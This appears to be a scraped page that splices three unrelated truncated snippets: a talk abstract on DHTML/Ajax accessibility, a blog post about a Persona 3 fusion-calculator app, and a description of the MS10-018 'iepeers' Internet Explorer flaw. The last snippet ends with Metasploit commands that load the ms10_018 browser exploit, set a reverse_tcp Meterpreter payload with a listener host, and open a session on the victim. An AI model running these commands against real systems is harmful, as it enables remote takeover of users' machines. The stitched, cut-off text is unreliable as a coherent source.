Experiences with Accessibility in DHTML, Ajax, and Rich Internet Applications
Experiences with Accessibility in DHTML, Ajax, and Rich Internet Applications
The Internet's dramatic shift from static to dynamic sites presents a series of new challenges to those committed to and dependent upon accessibility. The new dynamic sites are beginning to offer rich functionality previously found only in desktop-based software applications. On the desktop, accessibility is maintained through interchangeable input (keyboard and mouse), and through OS-level APIs that facilitate detailed and continuous communication with Assistive Technology (AT). In the browser, this interchangeability is often missing, and what primitive AT communication there is bypasses the OS's API and is shared too infrequently. Learn about challenges of DHTML/Ajax accessibility, review the current state of the art, and see a series of four approaches that, in total, can make today's modern interfaces more accessible. A short clip about my DHTML project....
A short clip about my DHTML project....
Yeah, I wasn't going to say anything, but, I changed my mind and decided to do a quick video clip, might as well try out the new (well, I've had it for a while but hardly used it) screen capture software on something educational.... However, I didn't script what I was gonna say and I am talking much too fast and stuff, I don't think anyone can understand what I'm saying. Plus I took 9 minutes to talk about mostly nothing. Plus I didn't even preview the video before uploading it. So, whatever... Basically, I'm designing and building a PHP/MySQL (the PHP part is subject to change, as is the MySQL, for that matter) app to predict or otherwise help with the Persona 3 Velvet Room Fusions. I don't actually intend to use it much myself, but since the system is really complicated and involves a lot of data, it is the perfect test of a database system and also serves to demonstrate how Dynamic web-based apps can be used to process and present useful information. I don't have a release date so far, this is one of my spare time projects, and I've never tried something on this scale with these technologies... nor have I tried explicitly planning a project in detail so far... I don't think I showed it in this vid, but the project has 21 key milestones and what I demonstrated was part of #2. Actually, "milestone" is a bad name. "Major items" is a better name. So, so far, I've designed and implemented 2/3 of Major Item #2, approximately. Then there is the completion of data entry, which <b>...</b>

This bug was discovered being used in-the-wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, "The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object." NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected Metasploit demo : use windows/browser/ms10_018_ie_behaviors set SRVHOST 192.168.178.21 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sessions -i 1 sysinfo <b>...</b>
